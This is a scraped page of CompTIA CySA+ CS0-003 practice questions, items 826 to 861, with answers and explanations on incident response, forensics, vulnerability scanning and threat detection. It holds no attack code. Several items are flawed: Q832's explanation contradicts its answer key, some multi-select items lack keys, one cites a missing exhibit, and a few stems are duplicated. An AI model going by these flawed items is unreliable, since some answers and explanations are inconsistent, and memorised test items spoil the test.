CompTIA CySA+ CS0-003 (CS0-003) — Questions 826900

989 questions total · 14pages · All types, answers revealed

Page 11

Page 12 of 14

Page 13
826
MCQhard

File shares show rapid encryption and ransom-note creation from one workstation. What is the best immediate containment action? During containment, which decision is most defensible?

A.Run vulnerability scans on every subnet first
B.Restore backups before isolating the host
C.Email all users the ransom note
D.Isolate the workstation and disable its active sessions to file servers
AnswerD

Containment should stop encryption spread while preserving evidence for analysis. In containment, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to stop the ransomware from encrypting more data and spreading laterally. Isolating the workstation (e.g., disabling its network interface or disconnecting the cable) and terminating its active SMB sessions to file servers cuts off the encryption process at the source, preventing further damage while preserving forensic evidence.

Exam trap

The CS0-003 exam often tests the principle that containment must be immediate and technical (e.g., isolating the host) rather than investigative (scanning) or restorative (backups), and the trap here is that candidates may think scanning or restoring is a valid first step, when in fact it wastes critical time during active encryption.

How to eliminate wrong answers

Option A is wrong because running vulnerability scans is a time-consuming, passive step that does nothing to halt active encryption or lateral movement; containment must come first. Option B is wrong because restoring backups before isolating the host risks re-infection if the ransomware is still active on the network, and it violates the containment-first principle of incident response. Option C is wrong because emailing the ransom note to all users is not a containment action; it may cause panic, spread misinformation, and does not stop the encryption or disable the attacker's access.

827
Multi-Selectmedium

During the post-incident analysis phase of an incident response process, which of the following activities are considered essential best practices? Choose all that apply. (There are four correct answers.)

Select 4 answers
.Creating a detailed timeline of the incident from detection to containment and recovery.
.Identifying gaps in existing security controls that allowed the incident to occur.
.Updating playbooks and incident response plans based on lessons learned.
.Performing a root cause analysis to determine the underlying cause of the incident.
.Immediately deleting all logs related to the incident to free up storage space.
.Notifying law enforcement and regulatory bodies before conducting any internal investigation.

Why this answer

A detailed timeline is essential for reconstructing the sequence of events, identifying the initial compromise vector, and measuring response effectiveness. It provides a factual basis for all subsequent analysis and reporting, ensuring that the incident response team can accurately assess the scope and impact of the incident.

Exam trap

CompTIA often tests the distinction between 'immediate containment actions' and 'post-incident analysis best practices,' where candidates mistakenly select actions that are appropriate during the containment phase (like preserving evidence) but not during the analysis phase, or they confuse notification requirements with internal investigation priorities.

828
Multi-Selecthard

An emergency patch may break a revenue-critical system. Which actions balance risk and availability? (Choose two.)

Select 2 answers
A.Test the patch in a representative staging environment
B.Apply temporary compensating controls while preparing deployment
C.Disable monitoring to avoid alerts during the change
D.Ignore active exploitation until the next annual review
AnswersA, B

Testing reduces outage risk.

Why this answer

Option A is correct because testing the emergency patch in a representative staging environment that mirrors the production system's configuration, dependencies, and load allows you to identify potential breaking changes before deployment. This balances risk by validating the patch's impact on revenue-critical systems while maintaining availability, as any failures are contained in the test environment. Option B is correct because applying temporary compensating controls—such as additional monitoring, rate limiting, or failover mechanisms—provides a safety net that reduces the blast radius of a potential patch failure, enabling you to proceed with deployment while preserving system availability.

Exam trap

The CS0-003 exam often tests the misconception that disabling monitoring reduces operational overhead during changes, but the trap here is that it actually increases risk by removing the ability to detect and respond to failures, which is essential for maintaining availability in revenue-critical systems.

829
MCQmedium

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Disable the SIEM parser for PowerShell events
B.Reimage every workstation in the department
C.Close the alert because HTTPS is expected traffic
D.Decode the command and inspect the process tree, parent document, and network destination
AnswerD

Encoded PowerShell launched by Office is a high-signal chain; decoding and process-tree review confirms intent and scope.

Why this answer

Option D is correct because the encoded PowerShell command is the primary indicator of malicious intent; decoding it reveals the attacker's instructions. Inspecting the process tree (winword.exe spawning powershell.exe) confirms the infection vector (phishing attachment), and analyzing the parent document and network destination identifies the payload and C2 server. This sequence directly addresses root-cause analysis by tracing the attack from initial access to execution.

Exam trap

CompTIA often tests the misconception that encoded commands or HTTPS traffic are inherently benign, tempting candidates to dismiss the alert or take premature remediation steps instead of performing forensic analysis.

How to eliminate wrong answers

Option A is wrong because disabling the SIEM parser for PowerShell events would blind the security team to future attacks, not investigate the current alert. Option B is wrong because reimaging every workstation is a drastic remediation step that should only occur after confirming the scope of compromise through forensic analysis, not as a first analytic pivot. Option C is wrong because HTTPS is commonly used by malware to blend in with legitimate traffic; assuming it is benign ignores the context of an encoded PowerShell launch from a document reader.

830
Multi-Selecthard

A team requests a patch exception for a legacy application. What should be required? (Choose two.)

Select 2 answers
A.Documented compensating controls and monitoring
B.A time-bound owner-approved risk acceptance
C.Removal of the asset from inventory
D.Permanent suppression from all reports
AnswersA, B

Controls reduce risk while the vulnerability remains.

Why this answer

A is correct because when a patch cannot be applied to a legacy application, compensating controls (e.g., network segmentation, host-based firewall rules, or input validation) must be documented to mitigate the specific vulnerabilities the patch would address. Monitoring must also be implemented to detect any exploitation attempts against those unpatched weaknesses, ensuring the residual risk is continuously observed. This aligns with the vulnerability management lifecycle where exceptions require evidence of alternative risk reduction, not just a waiver.

Exam trap

The CS0-003 exam often tests that candidates confuse 'compensating controls' with 'removal from inventory' as a quick fix, but the trap here is that removing the asset is a separate action (decommissioning), not a valid component of a patch exception process.

831
MCQeasy

A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?

A.Endpoint detection and response (EDR) logs
B.Firewall logs
C.Authentication logs
D.DNS logs
AnswerC

Authentication logs directly record login attempts and outcomes.

Why this answer

Authentication logs record login events including source IP, timestamp, and success/failure status, making them the best source for identifying successful authentication from unusual locations.

832
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

Select 2 answers
A.Frequent DNS queries
B.HTTP POST requests
C.Large outbound data transfers during off-hours
D.Use of SCP on port 22
E.ICMP echo requests
AnswersC, D

Off-hours transfers are suspicious.

Why this answer

Port 22 (SSH) and SCP (Secure Copy) are commonly used for data exfiltration. Large data transfers off-hours are also suspicious. Both A and C are direct IOCs.

B (DNS tunneling) is not indicated, D (ICMP tunneling) is not shown, E (HTTP traffic) is not mentioned.

833
MCQmedium

During forensic acquisition, which of the following types of data is considered the MOST volatile?

A.Network connections.
B.Disk.
C.Page file.
D.RAM.
AnswerD

RAM is volatile and changes constantly; it is the most volatile.

Why this answer

RAM (Random Access Memory) is the most volatile data because it loses its contents immediately when power is removed. In forensic acquisition, the order of volatility dictates that RAM must be captured first, as it contains running processes, open network connections, and decrypted data that cannot be recovered from disk. Network connections, while volatile, are a subset of the data stored in RAM and are less critical to capture first.

Exam trap

CompTIA often tests the order of volatility by making candidates confuse 'network connections' as the most volatile because they change rapidly, but the key is that network connection data is stored in RAM, making RAM itself the most volatile component that must be acquired first.

How to eliminate wrong answers

Option A is wrong because network connections are a type of data that resides in RAM and are therefore less volatile than RAM itself; they are captured as part of the RAM dump. Option B is wrong because disk data is non-volatile and persists after power loss, making it the least volatile among the options. Option C is wrong because the page file (swap file) is stored on disk and is non-volatile; it is a secondary storage mechanism, not primary memory.

834
MCQeasy

During an incident response, the team identifies that a workstation was compromised via a phishing email. Which of the following should be performed immediately after containment?

A.Notify law enforcement about the phishing campaign.
B.Collect forensic evidence from the workstation.
C.Conduct a root cause analysis of the phishing email.
D.Eradicate the malware from the workstation.
AnswerD

Eradication follows containment to remove the threat.

Why this answer

Option D is correct because, immediately after containment, the priority is to eradicate the malware from the workstation to prevent reinfection or lateral movement. Containment isolates the system, but eradication removes the malicious artifacts (e.g., registry keys, scheduled tasks, or malicious binaries) to ensure the system is clean before recovery. This step aligns with the NIST SP 800-61 incident response lifecycle, where eradication follows containment to eliminate the threat's foothold.

Exam trap

CompTIA often tests the order of the incident response phases (containment, eradication, recovery, lessons learned) and the trap here is that candidates mistakenly choose 'Collect forensic evidence' (Option B) because they confuse the need for evidence with the immediate priority of removing the active threat after containment.

How to eliminate wrong answers

Option A is wrong because notifying law enforcement is a post-incident activity that occurs after eradication and recovery, not immediately after containment; premature notification can delay technical response and may not be required for every phishing incident. Option B is wrong because collecting forensic evidence should occur before containment (or during containment with proper imaging), not after containment, as containment actions (e.g., disconnecting the network) can alter volatile data if evidence collection is delayed. Option C is wrong because conducting a root cause analysis is part of the lessons-learned phase, which happens after eradication and recovery; performing it immediately after containment wastes time that should be spent removing the active threat.

835
Multi-Selectmedium

A security analyst is performing forensic analysis of a compromised system. The analyst needs to acquire disk evidence in a forensically sound manner. Which TWO actions should the analyst take to ensure the integrity of the evidence? (Choose TWO.)

Select 2 answers
A.Calculate a hash of the original drive before imaging
B.Disable the write blocker to speed up the imaging process
C.Use a write blocker when connecting the source drive
D.Power on the system and run a full antivirus scan before imaging
E.Reboot the system to clear any temporary files
AnswersA, C

Hashing the original drive allows later verification that the image matches.

Why this answer

Using a write blocker prevents alteration of the original disk, and computing a hash verifies that the acquired image is an exact copy.

836
Multi-Selectmedium

A vulnerability manager wants accurate Linux package findings. Which scan conditions are important? (Choose two.)

Select 2 answers
A.Authenticated access to inspect installed packages
B.Scanner account permissions sufficient for inventory commands
C.Only scanning ICMP echo replies
D.Changing server hostnames randomly
AnswersA, B

Local package state usually requires credentials.

Why this answer

For accurate Linux package findings, the vulnerability scanner must have authenticated access (e.g., via SSH with valid credentials) to inspect installed packages directly from the package manager database (e.g., RPM or dpkg). Without authentication, the scanner can only perform unauthenticated network-based checks, which cannot reliably determine installed software versions or patch levels. Authenticated access ensures the scanner can execute commands like 'rpm -qa' or 'dpkg -l' to enumerate packages with high accuracy.

Exam trap

The CS0-003 exam often tests the misconception that unauthenticated network scans (e.g., banner grabbing or ICMP) can replace authenticated scans for accurate software inventory, but only authenticated access with proper permissions yields reliable package-level findings.

837
MCQmedium

Based on the exhibit, which type of issue is most likely affecting the server's network performance?

A.Faulty network cable or interface
B.Duplex mismatch between the server and switch
C.Incorrect TCP/IP configuration
D.Outdated network driver
AnswerA

High CRC and frame errors suggest physical layer problems.

Why this answer

The exhibit shows excessive CRC errors and runts on the server's network interface, which are classic symptoms of a faulty physical layer component such as a damaged cable or failing NIC. These errors indicate that frames are being corrupted during transmission, and the interface is discarding them, leading to retransmissions and degraded performance. A faulty cable or interface directly causes these physical-layer issues, unlike configuration or driver problems.

Exam trap

CompTIA often tests the distinction between physical-layer errors (CRC, runts) and data-link layer issues (duplex mismatch, collisions), leading candidates to mistakenly choose duplex mismatch when the exhibit shows CRC errors instead of late collisions.

How to eliminate wrong answers

Option B is wrong because a duplex mismatch typically causes late collisions and FCS errors, not CRC errors and runts; the interface counters would show alignment errors and excessive collisions. Option C is wrong because incorrect TCP/IP configuration (e.g., wrong subnet mask, gateway, or DNS) would cause connectivity failures or routing issues, not physical-layer CRC errors. Option D is wrong because an outdated network driver might cause performance issues or interface resets, but it would not generate CRC errors or runts at the hardware level; those are physical-layer phenomena.

838
Multi-Selectmedium

An organization has just experienced a successful phishing attack that led to credential theft. The incident response team is performing analysis. Which three of the following indicators of compromise (IOCs) would be most relevant to investigate? (Choose three.)

Select 3 answers
.Unusual outbound network connections from user workstations.
.A spike in failed login attempts from a single IP address.
.New scheduled tasks created on endpoints without user knowledge.
.Emails with similar subject lines being sent from internal accounts.
.A sudden increase in available disk space on file servers.
.The antivirus definition file being updated automatically.

Why this answer

Unusual outbound network connections from user workstations are a key IOC because after credential theft, attackers often use stolen credentials to establish remote access or exfiltrate data, generating connections to command-and-control (C2) servers or unexpected external IPs. New scheduled tasks created on endpoints without user knowledge indicate persistence mechanisms, as attackers commonly use schtasks.exe or at.exe to maintain access and execute malicious code at regular intervals. Emails with similar subject lines being sent from internal accounts suggest lateral phishing or spam campaigns using compromised accounts to spread malware or harvest additional credentials, a classic post-exploitation behavior.

Exam trap

CompTIA often tests the distinction between indicators of a successful attack (post-compromise IOCs like lateral movement and persistence) versus indicators of an attempted attack (like brute-force failures), so candidates mistakenly choose failed login attempts instead of recognizing that credential theft leads to successful logins and internal propagation.

839
MCQeasy

Which metric in the CVSS v3.1 base score indicates the level of access an attacker needs to exploit a vulnerability?

A.Privileges Required (PR)
B.Attack Vector (AV)
C.Attack Complexity (AC)
D.User Interaction (UI)
AnswerA

PR indicates the privileges required to exploit.

Why this answer

Privileges Required (PR) indicates the level of privileges an attacker must have before successfully exploiting the vulnerability.

840
MCQeasy

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Successful DHCP renewal
B.A password expiry warning
C.High CPU usage on the print server
D.Office document spawning a script interpreter from a user context
AnswerD

Office-to-script process chains are common initial execution patterns for phishing payloads.

Why this answer

Option D is correct because the scenario describes a classic technique where a malicious macro or script embedded in an Office document executes wscript.exe (Windows Script Host) from the user's profile. This detection logic directly identifies the suspicious parent-child process relationship of an Office application spawning a script interpreter, which is a strong indicator of a script-based attack, such as a macro virus or initial access payload.

Exam trap

CompTIA often tests the concept of process lineage and anomalous parent-child relationships, where candidates may mistakenly focus on system-level performance or network events instead of recognizing that the key indicator is the Office document spawning a script interpreter from the user's profile.

How to eliminate wrong answers

Option A is wrong because a successful DHCP renewal is a routine network operation that does not involve process execution anomalies or user-initiated scripts, making it irrelevant to detecting a malicious script spawned from an Office document. Option B is wrong because a password expiry warning is an authentication event unrelated to process creation or script execution, and it does not indicate any compromise or suspicious activity on the endpoint. Option C is wrong because high CPU usage on the print server is a performance metric for a different system component and has no direct correlation with a user endpoint running wscript.exe from a script interpreter invoked by an Office document.

841
MCQmedium

A security analyst discovers a server that is missing multiple critical patches. The server hosts a legacy application that cannot be patched immediately due to compatibility issues. Which of the following is the BEST approach to manage the vulnerability risk?

A.Apply a virtual patch using a WAF
B.Implement network segmentation and increase monitoring
C.Disable the server until a patch is available
D.Remove the server from the network
AnswerB

This reduces risk by isolating the server and enabling detection of attacks.

Why this answer

Option B is the best approach because network segmentation isolates the vulnerable legacy server from critical assets, reducing the attack surface, while increased monitoring allows the security team to detect and respond to any exploitation attempts in real time. This balances risk acceptance with active defense, which is a core principle of vulnerability management when patching is not immediately feasible.

Exam trap

The trap here is that candidates often choose 'Apply a virtual patch using a WAF' because they overestimate the scope of WAF protection, forgetting that it only covers web-based attacks and not OS-level or protocol-level vulnerabilities.

How to eliminate wrong answers

Option A is wrong because a WAF (Web Application Firewall) applies virtual patches only at the application layer (HTTP/HTTPS), and cannot protect against vulnerabilities in other services (e.g., SMB, RDP, or OS-level exploits) that the legacy server may expose. Option C is wrong because disabling the server entirely disrupts business operations and is an overly drastic measure that does not align with risk management best practices unless the vulnerability is critical and actively exploited. Option D is wrong because removing the server from the network completely halts its function and is equivalent to decommissioning, which is not a temporary risk management strategy and ignores the need to maintain business continuity.

842
Drag & Dropmedium

Arrange the steps for conducting a risk assessment in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Risk assessment involves asset identification, threat/vulnerability identification, likelihood/impact analysis, risk calculation, and prioritization.

843
MCQmedium

A security analyst notices that an IDS is generating a high number of false positives for legitimate encrypted traffic. Which tuning method should the analyst use to reduce false positives without reducing detection capability?

A.Whitelist the source IP addresses of known, trusted servers.
B.Disable the signatures that trigger for encrypted traffic.
C.Increase the sensitivity threshold for the encrypted traffic signatures.
D.Enable full packet capture and analyze the encrypted traffic manually.
AnswerA

Whitelisting reduces false positives by exempting known benign traffic.

Why this answer

Whitelisting the source IP addresses of known, trusted servers reduces false positives by instructing the IDS to ignore alerts for encrypted traffic from those specific hosts. This approach preserves detection capability because the IDS continues to apply all signatures to traffic from other, potentially malicious sources. It is a targeted tuning method that does not disable detection mechanisms or alter sensitivity thresholds, which could otherwise miss real threats.

Exam trap

CompTIA often tests the misconception that disabling signatures or increasing thresholds is an acceptable tuning method, but the trap here is that those actions reduce detection capability, whereas whitelisting trusted sources is the only option that maintains full detection for untrusted traffic.

How to eliminate wrong answers

Option B is wrong because disabling signatures that trigger for encrypted traffic would eliminate detection of any malicious activity hidden within that encrypted stream, such as command-and-control traffic or data exfiltration, thus reducing detection capability. Option C is wrong because increasing the sensitivity threshold for encrypted traffic signatures would actually make the IDS less likely to trigger on any encrypted traffic, potentially missing real attacks while still generating false positives for legitimate traffic that exceeds the new threshold. Option D is wrong because enabling full packet capture and manually analyzing encrypted traffic is not a tuning method; it is a resource-intensive forensic approach that does not reduce false positives in real-time and does not scale for ongoing operations.

844
MCQmedium

A security analyst is preparing a vulnerability report for the IT operations team. Which section should provide a high-level overview of the organization's risk posture?

A.Risk acceptance
B.Executive summary
C.Remediation timeline
D.Findings by severity
AnswerB

The executive summary gives a high-level risk overview.

Why this answer

The executive summary provides a concise overview of key findings and risk posture for management.

845
MCQeasy

An organization wants to automate the sharing of threat intelligence with other trusted entities using a standardized protocol. Which protocol is specifically designed for this purpose?

A.STIX
B.TAXII
C.REST API
D.MISP
AnswerB

TAXII is the transport protocol for sharing threat intelligence.

Why this answer

TAXII (Trusted Automated eXchange of Indicator Information) is a protocol for exchanging cyber threat intelligence in a standardized format, often used with STIX.

846
MCQhard

A credentialed Linux scan fails on several hosts after SSH hardening. What is the BEST next step? For validation, Which action should be taken before closing or downgrading the finding?

A.Run only unauthenticated scans forever
B.Disable SSH on all servers
C.Assume the hosts have no vulnerabilities
D.Review scanner account permissions, allowed authentication methods, and sudo command restrictions
AnswerD

Credentialed scans depend on authentication and sufficient read access to inspect packages and configuration.

Why this answer

Option D is correct because SSH hardening (e.g., disabling password authentication, restricting ciphers, or enforcing key-based login) can break credentialed scans if the scanner's account permissions, allowed authentication methods, or sudo command restrictions are not aligned with the new configuration. Reviewing these settings ensures the scanner can authenticate and execute privileged commands, restoring scan coverage without compromising security.

Exam trap

The CS0-003 exam often tests the misconception that a scan failure after hardening means the hosts are secure, when in reality the failure is a connectivity or authentication issue that must be resolved to maintain visibility.

How to eliminate wrong answers

Option A is wrong because running only unauthenticated scans forever would miss critical vulnerabilities that require authenticated access (e.g., local privilege escalation, missing patches), violating best practices for comprehensive vulnerability management. Option B is wrong because disabling SSH on all servers would break remote administration and defeat the purpose of scanning; SSH is the standard secure remote access protocol, and disabling it is not a viable remediation. Option C is wrong because assuming hosts have no vulnerabilities after a scan failure is a dangerous assumption; the scan failure indicates a configuration issue, not an absence of vulnerabilities, and could lead to unpatched systems being exploited.

847
MCQmedium

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Publish the indicators on a public GitHub repository
B.Send the indicators to all customers
C.Ignore the indicators because TLP markings are optional
D.Use them internally with only people who need to know and avoid wider redistribution
AnswerD

TLP:AMBER+STRICT restricts sharing to the recipient organisation on a need-to-know basis.

Why this answer

TLP:AMBER+STRICT restricts sharing to recipients within the organization who need to know, prohibiting further redistribution outside the organization. The SOC must use these indicators internally only with personnel who require them for detection and response, avoiding any external sharing. This ensures compliance with the Traffic Light Protocol (TLP) standard defined by FIRST.org.

Exam trap

CompTIA often tests the misconception that TLP markings are optional or advisory, when in fact they are binding protocols that dictate strict handling and redistribution rules, especially with the 'STRICT' qualifier.

How to eliminate wrong answers

Option A is wrong because publishing indicators on a public GitHub repository violates the TLP:AMBER+STRICT restriction, which explicitly forbids sharing outside the organization. Option B is wrong because sending indicators to all customers would constitute unauthorized redistribution beyond the intended recipients, breaching the 'strict' constraint. Option C is wrong because TLP markings are mandatory for handling sensitive information; ignoring them could lead to data leaks and non-compliance with security policies.

848
MCQhard

A security analyst is performing memory acquisition on a compromised Linux server using LiME. The analyst needs to capture the memory image with minimal impact on the system. Which of the following parameters should the analyst use to ensure the output is forensically sound?

A.Use the --digest option to calculate a SHA256 hash during acquisition
B.Specify a format that compresses the output to reduce size
C.Ensure the output path is on a write-blocked device
D.Use the --reload option to reload the original kernel module after acquisition
AnswerC

Writing to a write-blocked device prevents accidental modification of evidence.

Why this answer

Using a write blocker ensures the memory capture does not alter the storage media, preserving forensic integrity.

849
MCQhard

A security team is implementing a patch management process for a large enterprise. They must ensure that patches are tested before deployment to production. The team has a staging environment that mirrors production. During patch testing, they discover that a critical security patch for a database server causes a performance degradation of 30% in a key application. What should the team do next?

A.Skip the patch and rely on existing security controls.
B.Apply the patch to production immediately because it fixes a critical vulnerability.
C.Contact the vendor for a fix or workaround, and implement compensating controls in the meantime.
D.Deploy the patch to a subset of production servers to test performance.
AnswerC

This addresses both the vulnerability and the performance issue.

Why this answer

The patch is critical but causes performance issues. The best approach is to work with the vendor for a resolution or apply compensating controls until a fix is available. Applying the patch blindly may disrupt operations, while skipping it leaves the vulnerability unaddressed.

850
Multi-Selectmedium

Which THREE of the following are essential tools and technologies used in a Security Operations Center (SOC) for monitoring and detection?

Select 3 answers
A.Firewall
B.Endpoint Detection and Response (EDR)
C.Intrusion Detection/Prevention System (IDS/IPS)
D.Security Information and Event Management (SIEM) system
E.Vulnerability scanner
AnswersB, C, D

Host-level monitoring and detection.

Why this answer

Endpoint Detection and Response (EDR) is essential in a SOC because it provides continuous monitoring and analysis of endpoint activities, enabling detection of advanced threats such as fileless malware and ransomware. EDR tools collect telemetry data from endpoints, correlate it with threat intelligence, and allow for automated response actions, which are critical for real-time incident detection and investigation.

Exam trap

CompTIA often tests the distinction between tools that provide continuous monitoring and detection (SIEM, EDR, IDS/IPS) versus tools that are preventive or periodic (firewall, vulnerability scanner), leading candidates to incorrectly include the latter as essential SOC monitoring technologies.

851
Multi-Selectmedium

An organization is experiencing a distributed denial-of-service (DDoS) attack targeting its web servers. The incident response team is implementing containment strategies. Which TWO actions are appropriate for short-term containment of a DDoS attack? (Choose TWO.)

Select 2 answers
A.Rerouting traffic through a DDoS mitigation service or scrubbing center
B.Disabling the accounts of the attackers
C.Applying a security patch to the web server software
D.Rebuilding the web servers from clean images
E.Blocking the attacking IP addresses at the firewall
AnswersA, E

Scrubbing centers filter malicious traffic before it reaches the origin.

Why this answer

Short-term containment for DDoS includes blocking attack traffic at the network perimeter and diverting traffic via a scrubbing center. Patching servers does not stop the attack, and rebuilding is recovery.

852
MCQhard

During a forensic investigation, an analyst finds a suspicious registry key that runs a program at startup. What is the best way to determine if the program is malicious?

A.Search the startup folder for the file
B.Compute the hash of the executable and query threat intelligence
C.Execute the program in a sandbox and observe behavior
D.Check the file's last modified timestamp
AnswerB

Hash check indicates known malicious status.

Why this answer

Computing the hash of the executable and querying threat intelligence (e.g., VirusTotal, AlienVault OTX) provides a definitive, objective indicator of known maliciousness by comparing the file's cryptographic fingerprint against global threat databases. This is the fastest and most reliable method to determine if the program is malicious without risking execution or relying on circumstantial evidence.

Exam trap

The CS0-003 exam often tests the distinction between 'best first step' and 'thorough analysis'—candidates mistakenly choose sandbox execution (Option C) because it seems more comprehensive, but the exam prioritizes speed and safety via hash-based threat intelligence queries.

How to eliminate wrong answers

Option A is wrong because searching the startup folder only confirms the file's location, not its maliciousness; legitimate programs also reside there. Option C is wrong because executing the program in a sandbox, while useful for behavioral analysis, is time-consuming and could still expose the system to risk if the sandbox is misconfigured; it is not the 'best' first step. Option D is wrong because the last modified timestamp is metadata that can be easily altered (timestomping) and provides no indication of malicious intent.

853
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Only physical datacenter access logs
B.Container runtime events, Kubernetes audit logs, and network flow from the pod
C.Only monthly vulnerability scan summaries
D.Only user password age reports
AnswerB

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Option B is correct because container runtime events (e.g., Docker/containerd exec logs) capture the unexpected shell launch, Kubernetes audit logs record the pod creation and mount operations, and network flow logs (e.g., NetFlow, eBPF-based tools) reveal the outbound connection to the unknown IP. Together, these provide the granular, real-time telemetry needed to detect and investigate the compromise, unlike static or coarse-grained logs.

Exam trap

The CS0-003 exam often tests the misconception that any single log source (e.g., only network flows or only audit logs) is sufficient, when in reality container compromises require correlating runtime, orchestration, and network telemetry to fully understand the attack chain.

How to eliminate wrong answers

Option A is wrong because physical datacenter access logs only track physical entry and have no visibility into container-level activities like shell execution, filesystem mounts, or outbound network flows. Option C is wrong because monthly vulnerability scan summaries are point-in-time snapshots of known CVEs and cannot capture dynamic runtime events such as a shell spawning or live network connections. Option D is wrong because user password age reports are identity management artifacts unrelated to runtime container behavior or network telemetry.

854
MCQeasy

A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?

A.Nikto
B.Wireshark
C.Nmap
D.tcpdump
AnswerB

Wireshark provides detailed packet inspection and payload analysis.

Why this answer

Wireshark captures and analyzes packet payloads, which is necessary for examining the content of encrypted or unencrypted traffic.

855
Multi-Selectmedium

What should be included in incident scoping for ransomware? (Choose three.)

Select 3 answers
A.Initial infected host and user context
B.The brand of office chairs near the server room
C.Backup integrity and last known clean restore point
D.Shares or systems touched by the compromised account
AnswersA, C, D

The starting point helps identify root cause.

Why this answer

Option A is correct because identifying the initial infected host and user context is critical for understanding the attack vector, containing the threat, and preventing further spread. In ransomware incidents, the first compromised system often reveals the entry point (e.g., phishing email, RDP brute force) and the user account used, which helps scope the blast radius and prioritize remediation.

Exam trap

The CS0-003 exam often tests the ability to filter out irrelevant physical or administrative details (like office chairs) that distract from the core technical scoping steps required in incident response.

856
MCQeasy

Which of the following is the primary purpose of log normalisation in a SIEM?

A.Encrypt logs to protect confidentiality
B.Reduce storage space by compressing log data
C.Remove false positives from log entries
D.Convert logs into a standardised format for correlation and analysis
AnswerD

Normalisation ensures consistent field names and values across diverse log sources.

Why this answer

Log normalisation converts logs from different sources into a common, structured format so that the SIEM can correlate and analyse them uniformly.

857
MCQhard

A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?

A.Large number of NXDOMAIN responses
B.DNS queries with unusually large TXT record response sizes
C.High number of A record queries
D.Queries originating from a DNS server
AnswerB

Correct. Large TXT records are a common sign of data exfiltration via DNS tunneling.

Why this answer

DNS tunneling often uses TXT records to encode data, and the packet sizes can be larger than normal DNS queries.

858
MCQeasy

A supplier provides a software product used in a regulated environment. The security team wants visibility into included libraries and versions. What should they request? For stakeholder management, Which documentation or approval is required to keep the programme defensible?

A.A software bill of materials
B.A building floor plan
C.A password complexity screenshot only
D.A DNS MX record report
AnswerA

An SBOM lists software components and versions, supporting dependency risk analysis.

Why this answer

A Software Bill of Materials (SBOM) is a formal, machine-readable inventory (often in SPDX or CycloneDX format) that lists all third-party libraries, their versions, and dependencies. In a regulated environment, this provides the security team with the visibility needed to assess vulnerabilities (e.g., Log4Shell) and ensure compliance with standards like NIST SP 800-53 or FDA cybersecurity guidance. Requesting an SBOM is the standard practice for supply chain risk management.

Exam trap

The CS0-003 exam often tests the distinction between operational security artifacts (like password policies or DNS records) and the specific supply chain documentation (SBOM) required for software composition analysis, leading candidates to confuse general security controls with component inventory.

How to eliminate wrong answers

Option B is wrong because a building floor plan is a physical security document unrelated to software library inventory or version tracking. Option C is wrong because a password complexity screenshot only verifies a single authentication policy, not the composition of included libraries and their versions. Option D is wrong because a DNS MX record report lists mail exchange servers for email routing, not software components or their versions.

859
Multi-Selecthard

An organization has identified a ransomware outbreak on several workstations. Which TWO actions should the incident response team take immediately?

Select 2 answers
A.Pay the ransom to recover data quickly.
B.Disconnect all network shares to prevent encryption.
C.Contact law enforcement for guidance.
D.Reimage all affected systems immediately.
E.Isolate the affected workstations from the network.
AnswersB, E

Prevents ransomware from encrypting shared data.

Why this answer

Isolating affected systems prevents further spread, and disconnecting network shares stops lateral movement. Contacting law enforcement can be done later; paying ransom is not recommended; reimaging may destroy evidence before investigation.

860
MCQmedium

A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed? For tool configuration, Which scanner or pipeline change most directly improves result quality?

A.Increase only the port range
B.Trust the unauthenticated result as complete
C.Run authenticated scans using least-privilege scanner credentials
D.Disable host firewalls permanently
AnswerC

Authenticated scanning gives the scanner access to installed software and patch state, improving accuracy.

Why this answer

Unauthenticated scans rely on network-visible services and banners, which miss registry-level patch data, OS configuration details, and installed updates. Authenticated scans with least-privilege credentials (e.g., using WMI, WinRM, or the Windows Update API) provide deep visibility into missing patches by querying the actual patch database (e.g., via the Microsoft Update Catalog or WSUS). This directly addresses the security manager's suspicion of missing patch data, making option C the correct choice.

Exam trap

The CS0-003 exam often tests the misconception that increasing scan scope (ports, protocols) or disabling firewalls can substitute for proper authentication, when in fact only credentialed scanning provides the access needed to assess patch levels accurately.

How to eliminate wrong answers

Option A is wrong because increasing the port range only expands the number of ports scanned for open services; it does not enable credential-based access to patch information, so missing patch data remains invisible. Option B is wrong because trusting unauthenticated results as complete ignores the fundamental limitation that unauthenticated scans cannot access registry, file system, or WMI data needed to verify patch levels, leading to false negatives. Option D is wrong because disabling host firewalls permanently is an insecure and drastic measure that does not grant the scanner the necessary privileges to read patch data; it only removes network-level access controls, not the authentication requirement.

861
Multi-Selectmedium

Which three of the following are effective techniques for prioritizing vulnerabilities for remediation in a vulnerability management program? (Choose three.)

Select 3 answers
.Applying the Common Vulnerability Scoring System (CVSS) base score as the sole prioritization metric
.Correlating vulnerabilities with active exploit campaigns and threat intelligence feeds
.Using asset criticality ratings derived from business impact analysis (BIA)
.Prioritizing vulnerabilities based solely on the age of the CVE
.Incorporating compensating controls that may reduce the effective risk of a vulnerability
.Focusing remediation efforts exclusively on vulnerabilities with a CVSS score of 9.0 or higher

Why this answer

